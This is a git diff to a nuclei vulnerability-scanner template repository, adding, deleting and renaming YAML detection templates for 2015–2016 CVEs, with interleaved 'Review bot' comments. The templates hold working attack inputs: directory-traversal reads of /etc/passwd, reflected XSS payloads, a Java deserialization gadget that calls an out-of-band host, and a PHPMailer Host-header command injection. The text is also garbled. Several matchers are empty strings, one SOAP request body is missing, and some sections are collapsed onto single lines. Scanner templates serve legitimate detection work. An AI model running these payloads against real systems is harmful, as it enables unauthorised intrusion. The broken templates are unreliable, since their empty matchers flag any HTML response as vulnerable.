new file mode 100644
index 0000000000..be886e0f23
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-2067.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-2067
+
+info:
+ name: Magento Server Magmi Plugin - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/35996
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-2067
+ - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
+ classification:
+ cve-id: CVE-2015-2067
+ tags: cve,cve2015,lfi,magento,magmi,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-3224.yaml b/nuclei-templates/CVE-2015/cve-2015-3224.yaml
new file mode 100644
index 0000000000..34a797940a
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-3224.yaml
@@ -0,0 +1,43 @@
+id: CVE-2015-3224
+
+info:
+ name: Ruby on Rails Web Console - Remote Code Execution
+ author: pdteam
+ severity: critical
+ description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
+ reference:
+ - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
+ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
+ - https://hackerone.com/reports/44513
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-3224
+ classification:
+ cve-id: CVE-2015-3224
+ tags: ruby,hackerone,cve,cve2015,rce,rails
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/{{randstr}}"
+
+ headers:
+ X-Forwarded-For: ::1
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Rails.root:"
+ - "Action Controller: Exception caught"
+ condition: and
+
+ - type: word
+ part: response
+ words:
+ - "X-Web-Console-Session-Id"
+ - "data-remote-path="
+ - "data-session-id="
+ case-insensitive: true
+ condition: or
+
+# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2015/cve-2015-3337.yaml b/nuclei-templates/CVE-2015/cve-2015-3337.yaml
new file mode 100644
index 0000000000..9f755b9cac
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-3337.yaml
@@ -0,0 +1,31 @@
+id: CVE-2015-3337
+
+info:
+ name: Elasticsearch Head plugin LFI
+ author: pdteam
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ reference:
+ - https://www.exploit-db.com/exploits/37054/
+ - http://www.securityfocus.com/archive/1/535385
+ - https://www.elastic.co/community/security
+ - http://www.debian.org/security/2015/dsa-3241
+ classification:
+ cve-id: CVE-2015-3337
+ tags: cve,cve2015,elastic,lfi,elasticsearch,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-5471.yaml b/nuclei-templates/CVE-2015/cve-2015-5471.yaml
new file mode 100644
index 0000000000..4b257f672c
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-5471.yaml
@@ -0,0 +1,37 @@
+id: CVE-2015-5471
+
+info:
+ name: Swim Team <= v1.44.10777 - Local File Inclusion
+ author: 0x_Akoko
+ severity: medium
+ description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
+ reference:
+ - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
+ - http://www.vapid.dhs.org/advisory.php?v=134
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-5471
+ - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
+ remediation: Upgrade to Swim Team version 1.45 or newer.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2015-5471
+ cwe-id: CWE-22
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs on 2022/02/25
diff --git a/nuclei-templates/CVE-2015/cve-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml
new file mode 100644
index 0000000000..b0c4f26019
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-6544.yaml
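Review bot: This template is added under a lower-case file name while an upper-case-named copy with the same `id` is removed earlier in the commit (the same pattern is visible for `CVE-2015-6544.yaml` deleted and `cve-2015-6544.yaml` added), and other entries in the same directory go the opposite way (`cve-2015-8349.yaml` renamed to `CVE-2015-8349.yaml`). Paths that differ only by letter case are a single file on case-insensitive checkouts, so a delete-plus-add pair like this can leave such a working tree without the template or with the old content, and the directory ends up with mixed casing that makes duplicate ids hard to spot. The sync job should normalise names to one casing before committing and say so where it writes the files, for example `# template file names are lower-cased before write; one file per template id`.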
@@ -0,0 +1,40 @@
+id: CVE-2015-6544
+
+info:
+ name: iTop XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-6544
+ - https://www.htbridge.com/advisory/HTB23268
+ - http://sourceforge.net/p/itop/tickets/1114/
+ - http://sourceforge.net/p/itop/code/3662/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2015-6544
+ cwe-id: CWE-79
+ tags: cve,cve2015,xss,itop
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/nuclei-templates/CVE-2015/cve-2015-7377.yaml b/nuclei-templates/CVE-2015/cve-2015-7377.yaml
new file mode 100644
index 0000000000..a5229480b0
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-7377.yaml
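Review bot: The body `word` matcher lists a single empty string (`- ''`) as shown here; if that is the file's real content and not a rendering loss on this page, it matches every body, so the template reports any 200 `text/html` response as vulnerable. The word should be the decoded form of the `title=` payload so that only an unencoded reflection counts, e.g. `- '</script><script>alert(document.domain)</script>'`. The same empty body matcher appears in the added cve-2015-7377, cve-2016-1000131, cve-2016-1000133, cve-2016-1000143 and cve-2016-1000149 templates, so all of them need the same check before the results are trusted.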
@@ -0,0 +1,36 @@
+id: CVE-2015-7377
+
+info:
+ name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI.
+ reference:
+ - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7377
+ - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
+ - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt
+ classification:
+ cve-id: CVE-2015-7377
+ tags: cve,cve2015,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-7450.yaml b/nuclei-templates/CVE-2015/cve-2015-7450.yaml
new file mode 100644
index 0000000000..4f0418f4b2
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-7450.yaml
@@ -0,0 +1,59 @@ +id: CVE-2015-7450 + +info: + name: IBM WebSphere Java Object Deserialization - Remote Code Execution + author: wdahlenb + severity: critical + description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + reference: + - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py + - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 + - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-7450 + cwe-id: CWE-94 + tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + SOAPAction: "urn:AdminService" + + + + + + + + rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== + getUnsavedChanges + {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} + rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= + + + + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + words: + - 'SOAP-ENV:Server' + - '' + condition: and + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/cve-2015-7823.yaml b/nuclei-templates/CVE-2015/cve-2015-7823.yaml new file mode 100644 index 0000000000..78174bdbb0 
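Review bot: The raw request is sent to `{{Hostname}}` exactly as supplied, while the description places the vulnerable SOAP connector on port 8880 by default, so a scan fed ordinary web URLs never reaches the connector and a clean result says nothing about exposure. State the requirement in the template, for example a comment above `requests:` reading `# target must be the SOAP connector endpoint (default port 8880), not the application port`. The `tags:` line also omits `kev`, which the upper-case copy deleted earlier in this commit carried, so anyone filtering or prioritising on that tag stops seeing this template.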
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-7823.yaml
@@ -0,0 +1,25 @@
+id: CVE-2015-7823
+
+info:
+ name: Kentico CMS 8.2 Open Redirection
+ author: 0x_Akoko
+ severity: low
+ description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
+ reference:
+ - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
+ - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
+ classification:
+ cve-id: CVE-2015-7823
+ tags: cve,cve2015,kentico,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/nuclei-templates/CVE-2015/cve-2015-8399.yaml b/nuclei-templates/CVE-2015/cve-2015-8399.yaml
new file mode 100644
index 0000000000..907864b58b
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-8399.yaml
@@ -0,0 +1,37 @@
+id: CVE-2015-8399
+
+info:
+ name: Atlassian Confluence configuration files read
+ author: princechaddha
+ severity: medium
+ description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
+ reference:
+ - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
+ - https://www.exploit-db.com/exploits/39170/
+ - http://www.securityfocus.com/archive/1/537232/100/0/threaded
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2015-8399
+ cwe-id: CWE-200
+ metadata:
+ shodan-query: http.component:"Atlassian Confluence"
+ tags: cve,cve2015,atlassian,confluence
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "confluence-init.properties"
+ - "View Default Decorator"
+ condition: and
diff --git a/nuclei-templates/CVE-2015/CVE-2015-9480.yaml b/nuclei-templates/CVE-2015/cve-2015-9480.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-9480.yaml
rename to nuclei-templates/CVE-2015/cve-2015-9480.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-0957.yaml b/nuclei-templates/CVE-2016/CVE-2016-0957.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-0957.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-0957.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000128.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000128.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000128.yaml
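Review bot: The description says the file read is available to remote authenticated users, but the single GET carries no session or credentials, so the template presumably only fires where anonymous access to spaces is enabled. A non-match against a login-protected Confluence is therefore not evidence that the instance is patched, and the classification's `PR:L` vector already implies that gap. Say so in `info`, e.g. append `This check is unauthenticated and only detects instances that allow anonymous access.` to `description`; the second endpoint the description names, `admin/viewdefaultdecorator.action`, is not probed either.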
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml deleted file mode 100644 index be2081c1a5..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000131 - -info: - name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin e-search v1.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 - - https://wordpress.org/plugins/e-search - - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000131 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml deleted file mode 100644 index 455133a336..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2016-1000133 - -info: - name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - - https://wordpress.org/plugins/forget-about-shortcode-buttons - - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000133 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000138.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000138.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000138.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000138.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000139.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000139.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000139.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000140.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000140.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000140.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000140.yaml 
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000142.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000142.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000142.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml deleted file mode 100644 index 65b05e634d..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2016-1000143 - -info: - name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 - tags: cve,cve2016,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000143 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml deleted file mode 100644 index 4b4633af3b..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2016-1000149 - -info: - name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 - - https://wordpress.org/plugins/simpel-reserveren - - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000149 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000152.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000152.yaml deleted file mode 100644 index 0f64d98a09..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000152.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2016-1000152 - -info: - name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin tidio-form v1.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 - - https://wordpress.org/plugins/tidio-form - - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000152 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000154.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000154.yaml deleted file mode 100644 index 1dab289247..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000154.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2016-1000154 - -info: - name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin whizz v1.0. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000154 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10033.yaml b/nuclei-templates/CVE-2016/CVE-2016-10033.yaml deleted file mode 100644 index c902fc75a9..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-10033.yaml +++ /dev/null 
@@ -1,56 +0,0 @@ -id: CVE-2016-10033 - -info: - name: WordPress PHPMailer < 5.2.18 - Remote Code Execution - author: princechaddha - severity: critical - description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. - reference: - - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html - - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 - - https://www.exploit-db.com/exploits/40970/ - - https://www.exploit-db.com/exploits/40968/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-10033 - cwe-id: CWE-77 - tags: cve,cve2016,rce,edb,wordpress - -requests: - - raw: - - |+ - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - |+ - POST /wp-login.php?action=lostpassword HTTP/1.1 - Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) - Accept: */* - Content-Type: application/x-www-form-urlencoded - - wp-submit=Get+New+Password&redirect_to=&user_login={{username}} - - unsafe: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/08/18 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000131.yaml b/nuclei-templates/CVE-2016/cve-2016-1000131.yaml new file mode 100644 index 0000000000..14269d707f --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000131.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2016-1000131
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin e-search v1.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=393
+ - https://wordpress.org/plugins/e-search
+ - http://www.securityfocus.com/bid/93867
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000131
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000133.yaml b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml
new file mode 100644
index 0000000000..154c2e4ebc
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000133
+
+info:
+ name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+ - https://wordpress.org/plugins/forget-about-shortcode-buttons
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=602
+ - http://www.securityfocus.com/bid/93869
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000133
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000143.yaml b/nuclei-templates/CVE-2016/cve-2016-1000143.yaml
new file mode 100644
